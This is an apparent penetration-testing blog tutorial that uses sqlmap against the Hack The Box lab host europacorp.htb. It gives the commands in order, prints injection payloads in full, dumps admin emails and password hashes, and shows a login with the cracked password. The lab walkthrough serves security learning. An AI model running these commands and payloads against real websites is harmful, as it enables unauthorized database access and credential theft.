How To Dump Username And Password Using SQLMap Tool?
Table of Content
- What is sqlmap in Kali?
- Dump Username And Password Using SQLMap
What is sqlmap in Kali?
SQLMap is an open-source tool that is used to both identify and exploit SQL injection vulnerabilities. SQLMap contains many advanced features such as the ability to dump username and password from a remote website and bypass WAF (Web Application Firewall) etc.
Dump Username And Password Using Sqlmap
In this blog, We are going to Introduce about SQLMap tool, which is most popular. Using this tool we will dump username and password from the remote website.
Let’s begin. We have opened the login page of Europa Corp admin portal. Keep in mind that this is a virtual environment. Don’t try to attack this website.
Let’s put some random email and password. First, we will intercept this traffic using the burp suite tool that comes pre-installed in Kali Linux.
We have intercepted all traffic of Europa Corp admin portal website using the burp suite tool. Let’s copy all content and save it in sql.req file.
sql.req file looks like this. Let’s open it using the cat command, which comes pre-installed in Kali Linux.
Before using the sqlmap tool, keep in mind that this website uses HTTPS (Hypertext Transfer Protocol Secure). If you don’t add –force-ssl command with sqlmap tool, you can get an SSL error. At this time, we will retrieve the database name using –dbs command.
sqlmap -r sql.req --force-ssl --dbs
sqlmap -r sql.req --force-ssl --dbs
___
__H__
___ ___["]_____ ___ ___ {1.6.1.1#dev}
|_ -| . [.] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 23:59:46 /2022-01-16/
[23:59:46] [INFO] parsing HTTP request from 'sql.req'
[23:59:46] [INFO] resuming back-end DBMS 'mysql'
[23:59:46] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: email=admin@europacorp.htb' RLIKE (SELECT (CASE WHEN (5462=5462) THEN 0x61646d696e406575726f7061636f72702e687462 ELSE 0x28 END))-- uqLz&password=password
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: email=admin@europacorp.htb' AND GTID_SUBSET(CONCAT(0x7178627671,(SELECT (ELT(6429=6429,1))),0x716a787871),6429)-- gHDo&password=password
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=admin@europacorp.htb' AND (SELECT 4034 FROM (SELECT(SLEEP(5)))WwrX)-- frlv&password=password
---
[23:59:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL 5
[23:59:48] [INFO] fetching database names
[23:59:48] [INFO] resumed: 'information_schema'
[23:59:48] [INFO] resumed: 'admin'
available databases [2]:
[*] admin
[*] information_schema
[23:59:48] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/admin-portal.europacorp.htb'
[*] ending @ 23:59:48 /2022-01-16/
</span>
Our first mission completed successfully. We have got the database name of remote website using the above command. Let’s find out all tables inside admin database. I think you should follow the below command.
sqlmap -r sql.req --force-ssl -D admin --tables
sqlmap -r sql.req --force-ssl -D admin --tables
___
__H__
___ ___[)]_____ ___ ___ {1.6.1.1#dev}
|_ -| . ['] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or da
mage caused by this program
[*] starting @ 00:03:09 /2022-01-17/
[00:03:09] [INFO] parsing HTTP request from 'sql.req'
[00:03:10] [INFO] resuming back-end DBMS 'mysql'
[00:03:10] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: email=admin@europacorp.htb' RLIKE (SELECT (CASE WHEN (5462=5462) THEN 0x61646d696e406575726f7061636f72702e687462 ELSE 0x28 END))-- uqLz&password=password
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: email=admin@europacorp.htb' AND GTID_SUBSET(CONCAT(0x7178627671,(SELECT (ELT(6429=6429,1))),0x716a787871),6429)-- gHDo&password=password
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=admin@europacorp.htb' AND (SELECT 4034 FROM (SELECT(SLEEP(5)))WwrX)-- frlv&password=password
---
[00:03:11] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL 5
[00:03:11] [INFO] fetching tables for database: 'admin'
[00:03:11] [INFO] resumed: 'users'
Database: admin
[1 table]
+-------+
| users |
+-------+
[00:03:11] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/admin-portal.europacorp.htb'
[*] ending @ 00:03:11 /2022-01-17/
We have got the table name inside the admin database using the above command. Let’s find out all columns inside users tables.
sqlmap -r sql.req --force-ssl -D admin -T users --columns
sqlmap -r sql.req --force-ssl -D admin -T users --columns
___
__H__
___ ___[']_____ ___ ___ {1.6.1.1#dev}
|_ -| . [(] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 00:05:52 /2022-01-17/
[00:05:52] [INFO] parsing HTTP request from 'sql.req'
[00:05:53] [INFO] resuming back-end DBMS 'mysql'
[00:05:53] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: email=admin@europacorp.htb' RLIKE (SELECT (CASE WHEN (5462=5462) THEN 0x61646d696e406575726f7061636f72702e687462 ELSE 0x28 END))-- uqLz&password=password
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: email=admin@europacorp.htb' AND GTID_SUBSET(CONCAT(0x7178627671,(SELECT (ELT(6429=6429,1))),0x716a787871),6429)-- gHDo&password=password
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=admin@europacorp.htb' AND (SELECT 4034 FROM (SELECT(SLEEP(5)))WwrX)-- frlv&password=password
---
[00:05:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL 5
[00:05:54] [INFO] fetching columns for table 'users' in database 'admin'
[00:05:54] [INFO] resumed: 'id'
[00:05:54] [INFO] resumed: 'int(11)'
[00:05:54] [INFO] resumed: 'username'
[00:05:54] [INFO] resumed: 'varchar(255)'
[00:05:54] [INFO] resumed: 'email'
[00:05:54] [INFO] resumed: 'varchar(255)'
[00:05:54] [INFO] resumed: 'password'
[00:05:54] [INFO] resumed: 'varchar(255)'
[00:05:54] [INFO] resumed: 'active'
[00:05:54] [INFO] resumed: 'tinyint(1)'
Database: admin
Table: users
[5 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| active | tinyint(1) |
| email | varchar(255) |
| id | int(11) |
| password | varchar(255) |
| username | varchar(255) |
+----------+--------------+
[00:05:54] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/admin-portal.europacorp.htb'
[*] ending @ 00:05:54 /2022-01-17/
We have got the column’s name inside the users tables using the above command. Let’s dump email and password credentials. Following the below command.
sqlmap -r sql.req --force-ssl -D admin -T users -C email,password --dump
sqlmap -r sql.req --force-ssl -D admin -T users -C email,password --dump
___
__H__
___ ___[,]_____ ___ ___ {1.6.1.1#dev}
|_ -| . [)] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or da
mage caused by this program
[*] starting @ 00:08:33 /2022-01-17/
[00:08:33] [INFO] parsing HTTP request from 'sql.req'
[00:08:34] [INFO] resuming back-end DBMS 'mysql'
[00:08:34] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: email=admin@europacorp.htb' RLIKE (SELECT (CASE WHEN (5462=5462) THEN 0x61646d696e406575726f7061636f72702e687462 ELSE 0x28 END))-- uqLz&password=password
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: email=admin@europacorp.htb' AND GTID_SUBSET(CONCAT(0x7178627671,(SELECT (ELT(6429=6429,1))),0x716a787871),6429)-- gHDo&password=password
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=admin@europacorp.htb' AND (SELECT 4034 FROM (SELECT(SLEEP(5)))WwrX)-- frlv&password=password
---
[00:08:36] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL 5
[00:08:36] [INFO] fetching entries of column(s) 'email,password' for table 'users' in database 'admin'
[00:08:38] [INFO] retrieved: 'admin@europacorp.htb'
[00:08:39] [INFO] retrieved: '2b6d315337f18617ba18922c0b9597ff'
[00:08:40] [INFO] retrieved: 'john@europacorp.htb'
[00:08:42] [INFO] retrieved: '2b6d315337f18617ba18922c0b9597ff'
[00:08:42] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: admin
Table: users
[2 entries]
+----------------------+----------------------------------+
| email | password |
+----------------------+----------------------------------+
| admin@europacorp.htb | 2b6d315337f18617ba18922c0b9597ff |
| john@europacorp.htb | 2b6d315337f18617ba18922c0b9597ff |
+----------------------+----------------------------------+
[00:08:46] [INFO] table 'admin.users' dumped to CSV file '/root/.local/share/sqlmap/output/admin-portal.europacorp.htb/dump/admin/users.csv'
[00:08:46] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/admin-portal.europacorp.htb'
[*] ending @ 00:08:46 /2022-01-17/
Boom! We have got the email and password of the remote website, but the password is encrypted. In modern security, most websites store encrypted passwords inside the database. But I am lazy. To decrypt user hashes, we will use the dcode website.
Let’s put valid credentials inside the email and password field. After that, we got 302 redirections of the remote website.
Take a closer look at the below image.
Login Successful!!!!!
Rating: 5 out of 5.
Recent Posts
- How To Dump Username And Password Using SQLMap Tool?
- Protected: Exploit Apache Log4j Security Vulnerabilities – CVE-2021-44228
- Hack The Box Previse HTB CTF Machine Walkthrough
- How Can I See List All Users In A MySQL Database Server
- How to Setup ProxyChains in Kali Linux 2021 || Fully Anonymous on Internet
Most Popular Posts
The post How To Dump Username And Password Using SQLMap Tool? appeared first on Pentestblog.
Descarga programas full El pirata de San Jhony
This post is sponsored by Woodmex Studio